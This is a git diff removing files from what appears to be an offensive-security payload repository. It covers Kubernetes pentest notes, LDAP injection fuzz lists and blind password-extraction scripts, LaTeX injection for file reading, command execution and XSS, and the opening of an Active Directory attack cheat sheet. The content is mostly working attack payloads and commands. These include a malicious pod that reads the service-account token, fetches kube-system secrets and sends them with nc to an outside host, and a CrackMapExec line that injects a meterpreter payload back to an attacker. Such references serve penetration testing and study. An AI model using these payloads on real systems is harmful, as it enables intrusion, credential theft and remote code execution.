filesystems. You can quickly find these with `grep -F "tmpfs ro" /etc/mtab`. - -True Kubernetes Volumes are typically used as shared storage or for persistent storage across restarts. These are typically mounted as ext4 filesystems and can be identified with `grep -wF "ext4" /etc/mtab`. - -### Privileged Containers - -Kubernetes supports a wide range of [security contexts](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) for container and pod execution. The most important of these is the "privileged" [security policy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) which makes the host node's devices available under the container's `/dev` directory. This means having access to the host's Docker socket file (allowing arbitrary container actions) in addition to the host's root disks (which can be used to escape the container entirely). - -While there is no official way to check for privileged mode from *within* a container, checking if `/dev/kmsg` exists will usually suffice. - -## RBAC Configuration - -### Listing Secrets - -An attacker that gains access to list secrets in the cluster can use the following curl commands to get all secrets in "kube-system" namespace. - -```powershell -curl -v -H "Authorization: Bearer " https://:/api/v1/namespaces/kube-system/secrets/ -``` - -### Access Any Resource or Verb - -```powershell -resources: -- '*' -verbs: -- '*' -``` - -### Pod Creation - -Check your right with `kubectl get role system:controller:bootstrap-signer -n kube-system -o yaml`. -Then create a malicious pod.yaml file. - -```yaml -apiVersion: v1 -kind: Pod -metadata: - name: alpine - namespace: kube-system -spec: - containers: - - name: alpine - image: alpine - command: ["/bin/sh"] - args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000'] - serviceAccountName: bootstrap-signer - automountServiceAccountToken: true - hostNetwork: true -``` - -Then `kubectl apply -f malicious-pod.yaml` - -### Privilege to Use Pods/Exec - -```powershell -kubectl exec -it -n –- sh -``` - -### Privilege to Get/Patch Rolebindings - -The purpose of this JSON file is to bind the admin "CluserRole" to the compromised service account. -Create a malicious RoleBinging.json file. - -```powershell -{ - "apiVersion": "rbac.authorization.k8s.io/v1", - "kind": "RoleBinding", - "metadata": { - "name": "malicious-rolebinding", - "namespcaes": "default" - }, - "roleRef": { - "apiGroup": "*", - "kind": "ClusterRole", - "name": "admin" - }, - "subjects": [ - { - "kind": "ServiceAccount", - "name": "sa-comp" - "namespace": "default" - } - ] -} -``` - -```powershell -curl -k -v -X POST -H "Authorization: Bearer " -H "Content-Type: application/json" https://:/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings -d @malicious-RoleBinging.json -curl -k -v -X POST -H "Authorization: Bearer " -H "Content-Type: application/json" https://:/api/v1/namespaces/kube-system/secret -``` - -### Impersonating a Privileged Account - -```powershell -curl -k -v -XGET -H "Authorization: Bearer " -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://:/api/v1/namespaces/kube-system/secrets/ -``` - -## Privileged Service Account Token - -```powershell -$ cat /run/secrets/kubernetes.io/serviceaccount/token -$ curl -k -v -H "Authorization: Bearer " https://:/api/v1/namespaces/default/secrets/ -``` - -## Interesting endpoints to reach - -```powershell -# List Pods -curl -v -H "Authorization: Bearer " https://:/api/v1/namespaces/default/pods/ - -# List secrets -curl -v -H "Authorization: Bearer " https://:/api/v1/namespaces/default/secrets/ - -# List deployments -curl -v -H "Authorization: Bearer " https:///apis/extensions/v1beta1/namespaces/default/deployments - -# List daemonsets -curl -v -H "Authorization: Bearer " https:///apis/extensions/v1beta1/namespaces/default/daemonsets -``` - - -## API addresses that you should know - -*(External network visibility)* - -### cAdvisor - -```powershell -curl -k https://:4194 -``` - -### Insecure API server - -```powershell -curl -k https://:8080 -``` - -### Secure API Server - -```powershell -curl -k https://:(8|6)443/swaggerapi -curl -k https://:(8|6)443/healthz -curl -k https://:(8|6)443/api/v1 -``` - -### etcd API - -```powershell -curl -k https://:2379 -curl -k https://:2379/version -etcdctl --endpoints=http://:2379 get / --prefix --keys-only -``` - -### Kubelet API - -```powershell -curl -k https://:10250 -curl -k https://:10250/metrics -curl -k https://:10250/pods -``` - -### kubelet (Read only) - -```powershell -curl -k https://:10255 -http://:10255/pods -``` - - -## References - -- [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1) -- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2) -- [Kubernetes Pentest Methodology Part 3 - by Or Ida on November 21, 2019](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3) -- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0) -- [Kubernetes Pod Privilege Escalation](https://labs.bishopfox.com/tech-blog/bad-pods-kubernetes-pod-privilege-escalation) diff --git a/LDAP Injection/Intruder/LDAP_FUZZ.txt b/LDAP Injection/Intruder/LDAP_FUZZ.txt deleted file mode 100644 index a32a116..0000000 --- a/LDAP Injection/Intruder/LDAP_FUZZ.txt +++ /dev/null @@ -1,46 +0,0 @@ -* -*)(& -*))%00 -*()|%26' -*()|&' -*(|(mail=*)) -*(|(objectclass=*)) -*)(uid=*))(|(uid=* -*/* -*| -/ -// -//* -@* -| -admin* -admin*)((|userpassword=*) -admin*)((|userPassword=*) -x' or name()='username' or 'x'='y -! -%21 -%26 -%28 -%29 -%2A%28%7C%28mail%3D%2A%29%29 -%2A%28%7C%28objectclass%3D%2A%29%29 -%2A%7C -%7C -& -( -) -)(cn=))\x00 -*(|(mail=*)) -*(|(objectclass=*)) -*/* -*| -/ -// -//* -@* -x' or name()='username' or 'x'='y -| -*()|&' -admin* -admin*)((|userpassword=*) -*)(uid=*))(|(uid=* diff --git a/LDAP Injection/Intruder/LDAP_attributes.txt b/LDAP Injection/Intruder/LDAP_attributes.txt deleted file mode 100644 index adc08bb..0000000 --- a/LDAP Injection/Intruder/LDAP_attributes.txt +++ /dev/null @@ -1,27 +0,0 @@ -c -cn -co -commonName -dc -facsimileTelephoneNumber -givenName -gn -homePhone -id -jpegPhoto -l -mail -mobile -name -o -objectClass -ou -owner -pager -password -sn -st -surname -uid -username -userPassword diff --git a/LDAP Injection/README.md b/LDAP Injection/README.md deleted file mode 100644 index 35ed365..0000000 --- a/LDAP Injection/README.md +++ /dev/null @@ -1,197 +0,0 @@ -# LDAP Injection - -> LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy. - -## Summary - -* [Exploitation](#exploitation) -* [Payloads](#payloads) -* [Blind Exploitation](#blind-exploitation) -* [Defaults attributes](#defaults-attributes) -* [Exploiting userPassword attribute](#exploiting-userpassword-attribute) -* [Scripts](#scripts) - * [Discover valid LDAP fields](#discover-valid-ldap-fields) - * [Special blind LDAP injection](#special-blind-ldap-injection) - -## Exploitation - -Example 1. - -```sql -user = *)(uid=*))(|(uid=* -pass = password -query = (&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==)) -``` - -Example 2 - -```sql -user = admin)(!(&(1=0 -pass = q)) -query = (&(uid=admin)(!(&(1=0)(userPassword=q)))) -``` - -## Payloads - -```text -* -*)(& -*))%00 -)(cn=))\x00 -*()|%26' -*()|&' -*(|(mail=*)) -*(|(objectclass=*)) -*)(uid=*))(|(uid=* -*/* -*| -/ -// -//* -@* -| -admin* -admin*)((|userpassword=*) -admin*)((|userPassword=*) -x' or name()='username' or 'x'='y -``` - -## Blind Exploitation - -We can extract using a bypass login - -```sql -(&(sn=administrator)(password=*)) : OK -(&(sn=administrator)(password=A*)) : KO -(&(sn=administrator)(password=B*)) : KO -... -(&(sn=administrator)(password=M*)) : OK -(&(sn=administrator)(password=MA*)) : KO -(&(sn=administrator)(password=MB*)) : KO -... -(&(sn=administrator)(password=MY*)) : OK -(&(sn=administrator)(password=MYA*)) : KO -(&(sn=administrator)(password=MYB*)) : KO -(&(sn=administrator)(password=MYC*)) : KO -... -(&(sn=administrator)(password=MYK*)) : OK -(&(sn=administrator)(password=MYKE)) : OK -``` - -## Defaults attributes - -Can be used in an injection like `*)(ATTRIBUTE_HERE=*` - -```bash -userPassword -surname -name -cn -sn -objectClass -mail -givenName -commonName -``` - -## Exploiting userPassword attribute - -`userPassword` attribute is not a string like the `cn` attribute for example but it’s an OCTET STRING -In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18). - -> octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit. - -```bash -userPassword:2.5.13.18:=\xx (\xx is a byte) -userPassword:2.5.13.18:=\xx\xx -userPassword:2.5.13.18:=\xx\xx\xx -``` - -## Scripts - -### Discover valid LDAP fields - -```python -#!/usr/bin/python3 - -import requests -import string - -fields = [] - -url = 'https://URL.com/' - -f = open('dic', 'r') #Open the wordlists of common attributes -wordl = f.read().split('\n') -f.close() - -for i in wordl: - r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla)) - if 'TRUE CONDITION' in r.text: - fields.append(str(i)) - -print(fields) -``` - -Ref. [5][5] - -### Special blind LDAP injection (without "*") - -```python -#!/usr/bin/python3 - -import requests, string -alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;" - -flag = "" -for i in range(50): - print("[i] Looking for number " + str(i)) - for char in alphabet: - r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char) - if ("TRUE CONDITION" in r.text): - flag += char - print("[+] Flag: " + flag) - break -``` - -Ref. [5][5] - -```ruby -#!/usr/bin/env ruby - -require 'net/http' -alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('') - -flag = '' - -(0..50).each do |i| - puts("[i] Looking for number #{i}") - alphabet.each do |char| - r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}")) - if /TRUE CONDITION/.match?(r) - flag += char - puts("[+] Flag: #{flag}") - break - end - end -end -``` - -By [noraj](https://github.com/noraj) - - -## References - -* [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection) -* [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/) -* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/writeupecw2018admyssion/) -* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/) -* [How To Manage and Use LDAP Servers with OpenLDAP Utilities](https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities) -* [How To Configure OpenLDAP and Perform Administrative LDAP Tasks](https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks) -* SSH key authentication via LDAP - - [How to setup LDAP server for openssh-lpk](https://openssh-ldap-pubkey.readthedocs.io/en/latest/openldap.html) - - [openssh-lpk.ldif](https://github.com/Lullabot/openldap-schema/blob/master/openssh-lpk.ldif) - - [Setting up OpenLDAP server with OpenSSH-LPK on Ubuntu 14.04](https://blog.shichao.io/2015/04/17/setup_openldap_server_with_openssh_lpk_on_ubuntu.html) - - [SSH key authentication using LDAP](https://serverfault.com/questions/653792/ssh-key-authentication-using-ldap) - - [FR] [SSH et LDAP](https://wiki.lereset.org/ateliers:serveurmail:ldap-ssh) - - [SSH Public Keys in OpenLDAP](http://pig.made-it.com/ldap-openssh.html) \ No newline at end of file diff --git a/LICENSE b/LICENSE deleted file mode 100644 index a4a1a0d..0000000 --- a/LICENSE +++ /dev/null @@ -1,21 +0,0 @@ -MIT License - -Copyright (c) 2019 Swissky - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. diff --git a/LaTeX Injection/README.md b/LaTeX Injection/README.md deleted file mode 100644 index dbf0bc2..0000000 --- a/LaTeX Injection/README.md +++ /dev/null @@ -1,102 +0,0 @@ -# LaTex Injection - -## Read file - -Read file and interpret the LaTeX code in it: - -```tex -\input{/etc/passwd} -\include{somefile} # load .tex file (somefile.tex) -``` - -Read single lined file: - -```tex -\newread\file -\openin\file=/etc/issue -\read\file to\line -\text{\line} -\closein\file -``` - -Read multiple lined file: - -```tex -\newread\file -\openin\file=/etc/passwd -\loop\unless\ifeof\file - \read\file to\fileline - \text{\fileline} -\repeat -\closein\file -``` - -Read text file, **without** interpreting the content, it will only paste raw file content: - -```tex -\usepackage{verbatim} -\verbatiminput{/etc/passwd} -``` - -If injection point is past document header (`\usepackage` cannot be used), some control -characters can be deactivated in order to use `\input` on file containing `$`, `#`, -`_`, `&`, null bytes, ... (eg. perl scripts). - -```tex -\catcode `\$=12 -\catcode `\#=12 -\catcode `\_=12 -\catcode `\&=12 -\input{path_to_script.pl} -``` - -## Write file - -Write single lined file: - -```tex -\newwrite\outfile -\openout\outfile=cmd.tex -\write\outfile{Hello-world} -\write\outfile{Line 2} -\write\outfile{I like trains} -\closeout\outfile -``` - -## Command execution - -The output of the command will be redirected to stdout, therefore you need to use a temp file to get it. - -```tex -\immediate\write18{id > output} -\input{output} -``` - -If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`): - -```tex -\immediate\write18{env | base64 > test.tex} -\input{text.tex} -``` - -```tex -\input|ls|base64 -\input{|"/bin/hostname"} -``` - -## Cross Site Scripting - -From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) - -```tex -\url{javascript:alert(1)} -\href{javascript:alert(1)}{placeholder} -``` - -Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$` - -## References - -* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/) -* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a) -* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md deleted file mode 100644 index 662f63d..0000000 --- a/Methodology and Resources/Active Directory Attack.md +++ /dev/null @@ -1,4433 +0,0 @@ -# Active Directory Attacks - -## Summary - -- [Active Directory Attacks](#active-directory-attacks) - - [Summary](#summary) - - [Tools](#tools) - - [Kerberos Clock Synchronization](#kerberos-clock-synchronization) - - [Active Directory Recon](#active-directory-recon) - - [Using BloodHound](#using-bloodhound) - - [Using PowerView](#using-powerview) - - [Using AD Module](#using-ad-module) - - [From CVE to SYSTEM shell on DC](#from-cve-to-system-shell-on-dc) - - [MS14-068 Checksum Validation](#ms14-068-checksum-validation) - - [ZeroLogon](#zerologon) - - [PrintNightmare](#printnightmare) - - [samAccountName spoofing](#samaccountname-spoofing) - - [Open Shares](#open-shares) - - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share) - - [SCF Files](#scf-files) - - [URL Files](#url-files) - - [Windows Library Files](#windows-library-files) - - [Windows Search Connectors Files](#windows-search-connectors-files) - - [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences) - - [Exploit Group Policy Objects GPO](#exploit-group-policy-objects-gpo) - - [Find vulnerable GPO](#find-vulnerable-gpo) - - [Abuse GPO with SharpGPOAbuse](#abuse-gpo-with-sharpgpoabuse) - - [Abuse GPO with PowerGPOAbuse](#abuse-gpo-with-powergpoabuse) - - [Abuse GPO with pyGPOAbuse](#abuse-gpo-with-pygpoabuse) - - [Abuse GPO with PowerView](#abuse-gpo-with-powerview) - - [Abuse GPO with StandIn](#abuse-gpo-with-standin) - - [Dumping AD Domain Credentials](#dumping-ad-domain-credentials) - - [Using ndtsutil](#using-ndtsutil) - - [Using Vshadow](#using-vshadow) - - [Using vssadmin](#using-vssadmin) - - [Using DiskShadow (a Windows signed binary)](#using-diskshadow-a-windows-signed-binary) - - [Using esentutl.exe](#using-esentutlexe) - - [Extract hashes from ntds.dit](#extract-hashes-from-ntdsdit) - - [Alternatives - modules](#alternatives---modules) - - [Using Mimikatz DCSync](#using-mimikatz-dcsync) - - [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa) - - [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat) - - [NTDS Reversible Encryption](#ntds-reversible-encryption) - - [User Hunting](#user-hunting) - - [Password spraying](#password-spraying) - - [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing) - - [Spray a pre-generated passwords list](#spray-a-pre-generated-passwords-list) - - [Spray passwords against the RDP service](#spray-passwords-against-the-rdp-service) - - [BadPwdCount attribute](#badpwdcount-attribute) - - [Password in AD User comment](#password-in-ad-user-comment) - - [Password of Pre-Created Computer Account](#password-of-pre-created-computer-account) - - [Reading LAPS Password](#reading-laps-password) - - [Reading GMSA Password](#reading-gmsa-password) - - [Forging Golden GMSA](#forging-golden-gmsa) - - [Kerberos Tickets](#kerberos-tickets) - - [Dump Kerberos Tickets](#dump-kerberos-tickets) - - [Replay Kerberos Tickets](#replay-kerberos-tickets) - - [Convert Kerberos Tickets](#convert-kerberos-tickets) - - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) - - [Using Mimikatz](#using-mimikatz) - - [Using Meterpreter](#using-meterpreter) - - [Using a ticket on Linux](#using-a-ticket-on-linux) - - [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) - - [Pass-the-Ticket Diamond Tickets](#pass-the-ticket-diamond-tickets) - - [Pass-the-Ticket Sapphire Tickets](#pass-the-ticket-sapphire-tickets) - - [Kerberoasting](#kerberoasting) - - [KRB_AS_REP Roasting](#krb_as_rep-roasting) - - [Timeroasting](#timeroasting) - - [Pass-the-Hash](#pass-the-hash) - - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) - - [Using impacket](#using-impacket) - - [Using Rubeus](#using-rubeus) - - [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes) - - [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes) - - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying) - - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) - - [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4) - - [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6) - - [Drop the MIC](#drop-the-mic) - - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) - - [RemotePotato0 DCOM DCE RPC relay](#remotepotato0-dcom-dce-rpc-relay) - - [DNS Poisonning - Relay delegation with mitm6](#dns-poisonning---relay-delegation-with-mitm6) - - [Relaying with WebDav Trick](#relaying-with-webdav-trick) - - [Active Directory Certificate Services](#active-directory-certificate-services) - - [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates) - - [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates) - - [ESC3 - Misconfigured Enrollment Agent Templates](#esc3---misconfigured-enrollment-agent-templates) - - [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities) - - [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2) - - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control) - - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - - [ESC9 - No Security Extension](#esc9---no-security-extension) - - [ESC11 - Relaying NTLM to ICPR](#esc11---relaying-ntlm-to-icpr) - - [Certifried CVE-2022-26923](#certifried-cve-2022-26923) - - [Pass-The-Certificate](#pass-the-certificate) - - [UnPAC The Hash](#unpac-the-hash) - - [Shadow Credentials](#shadow-credentials) - - [Active Directory Groups](#active-directory-groups) - - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - - [Abusing DNS Admins Group](#abusing-dns-admins-group) - - [Abusing Schema Admins Group](#abusing-schema-admins-group) - - [Abusing Backup Operators Group](#abusing-backup-operators-group) - - [Active Directory Federation Services](#active-directory-federation-services) - - [ADFS - Golden SAML](#adfs---golden-saml) - - [Active Directory Integrated DNS](#active-directory-integrated-dns) - - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) - - [GenericAll](#genericall) - - [GenericWrite](#genericwrite) - - [GenericWrite and Remote Connection Manager](#genericwrite-and-remote-connection-manager) - - [WriteDACL](#writedacl) - - [WriteOwner](#writeowner) - - [ReadLAPSPassword](#readlapspassword) - - [ReadGMSAPassword](#readgmsapassword) - - [ForceChangePassword](#forcechangepassword) - - [DCOM Exploitation](#dcom-exploitation) - - [DCOM via MMC Application Class](#dcom-via-mmc-application-class) - - [DCOM via Excel](#dcom-via-excel) - - [DCOM via ShellExecute](#dcom-via-shellexecute) - - [Trust relationship between domains](#trust-relationship-between-domains) - - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - - [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket) - - [Privileged Access Management (PAM) Trust](#privileged-access-management-pam-trust) - - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation) - - [SpoolService Abuse with Unconstrained Delegation](#spoolservice-abuse-with-unconstrained-delegation) - - [MS-EFSRPC Abuse with Unconstrained Delegation](#ms---efsrpc-abuse-with-unconstrained-delegation) - - [Kerberos Constrained Delegation](#kerberos-constrained-delegation) - - [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation) - - [Kerberos Service for User Extension](#kerberos-service-for-user-extension) - - [S4U2self - Privilege Escalation](#s4u2self---privilege-escalation) - - [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049) - - [PrivExchange attack](#privexchange-attack) - - [SCCM Deployment](#sccm-deployment) - - [SCCM Network Access Accounts](#sccm-network-access-accounts) - - [SCCM Shares](#sccm-shares) - - [WSUS Deployment](#wsus-deployment) - - [RODC - Read Only Domain Controller](#rodc---read-only-domain-controller) - - [RODC Golden Ticket](#rodc-golden-ticket) - - [RODC Key List Attack](#rodc-key-list-attack) - - [RODC Computer Object](#rodc-computer-object) - - [PXE Boot image attack](#pxe-boot-image-attack) - - [DSRM Credentials](#dsrm-credentials) - - [DNS Reconnaissance](#dns-reconnaissance) - - [Linux Active Directory](#linux-active-directory) - - [CCACHE ticket reuse from /tmp](#ccache-ticket-reuse-from-tmp) - - [CCACHE ticket reuse from keyring](#ccache-ticket-reuse-from-keyring) - - [CCACHE ticket reuse from SSSD KCM](#ccache-ticket-reuse-from-sssd-kcm) - - [CCACHE ticket reuse from keytab](#ccache-ticket-reuse-from-keytab) - - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab) - - [References](#references) - -## Tools - -* [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows) -* [Responder](https://github.com/lgandx/Responder) -* [InveighZero](https://github.com/Kevin-Robertson/InveighZero) -* [Mimikatz](https://github.com/gentilkiwi/mimikatz) -* [Ranger](https://github.com/funkandwagnalls/ranger) -* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) -* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - - ```powershell - # use the latest release, CME is now a binary packaged will all its dependencies - root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip - - # execute cme (smb, winrm, mssql, ...) - root@payload$ cme smb -L - root@payload$ cme smb -M name_module -o VAR=DATA - root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth - root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares - root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher - root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable - root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 - root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" - root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' - root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz - root@payload$ cme mimikatz --server http --server-port 80 - ``` - -* [Mitm6](https://github.com/fox-it/mitm6.git) - - ```bash - git clone https://github.com/fox-it/mitm6.git && cd mitm6 - pip install . - mitm6 -d lab.local - ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i - # -wh: Server hosting WPAD file (Attacker’s IP) - # -t: Target (You cannot relay credentials to the same device that you’re spoofing) - # -i: open an interactive shell - ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access - ``` - -* [ADRecon](https://github.com/sense-of-security/ADRecon) - - ```powershell - .\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser - ``` - -* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script) - - ```powershell - powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1 - ``` - -* [Ping Castle](https://github.com/vletoux/pingcastle) - - ```powershell - pingcastle.exe --healthcheck --server --user --password --advanced-live --nullsession - pingcastle.exe --healthcheck --server domain.local - pingcastle.exe --graph --server domain.local - pingcastle.exe --scanner scanner_name --server domain.local - available scanners are:aclcheck,antivirus,computerversion,foreignusers,laps_bitlocker,localadmin,nullsession,nullsession-trust,oxidbindings,remote,share,smb,smb3querynetwork,spooler,startup,zerologon,computers,users - ``` - -* [Kerbrute](https://github.com/ropnop/kerbrute) - - ```powershell - ./kerbrute passwordspray -d - ``` - -* [Rubeus](https://github.com/GhostPack/Rubeus) - - ```powershell - Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ptt] [/luid] - Rubeus.exe dump [/service:SERVICE] [/luid:LOGINID] - Rubeus.exe klist [/luid:LOGINID] - Rubeus.exe kerberoast [/spn:"blah/blah"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] - ``` - -* [AutomatedLab](https://github.com/AutomatedLab/AutomatedLab) - ```powershell - New-LabDefinition -Name GettingStarted -DefaultVirtualizationEngine HyperV - Add-LabMachineDefinition -Name FirstServer -OperatingSystem 'Windows Server 2016 SERVERSTANDARD' - Install-Lab - Show-LabDeploymentSummary - ``` - - -## Kerberos Clock Synchronization - -In Kerberos, time is used to ensure that tickets are valid. To achieve this, the clocks of all Kerberos clients and servers in a realm must be synchronized to within a certain tolerance. The default clock skew tolerance in Kerberos is `5 minutes`, which means that the difference in time between the clocks of any two Kerberos entities should be no more than 5 minutes. - - -* Detect clock skew automatically with `nmap` - ```powershell - $ nmap -sV -sC 10.10.10.10 - clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s - ``` -* Compute yourself the difference between the clocks - ```ps1 - nmap -sT 10.10.10.10 -p445 --script smb2-time -vv - ``` -* Fix #1: Modify your clock - ```ps1 - sudo date -s "14 APR 2015 18:25:16" # Linux - net time /domain /set # Windows - ``` -* Fix #2: Fake your clock - ```ps1 - faketime -f '+8h' date - ``` - - -## Active Directory Recon - -### Using BloodHound - -Use the correct collector -* AzureHound for Azure Active Directory -* SharpHound for local Active Directory -* RustHound for local Active Directory - -* use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools)) - -* use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound) - ```powershell - # run the collector on the machine using SharpHound.exe - # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe - # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe - .\SharpHound.exe -c all -d active.htb --searchforest - .\SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default - .\SharpHound.exe --CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy) - - .\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder - 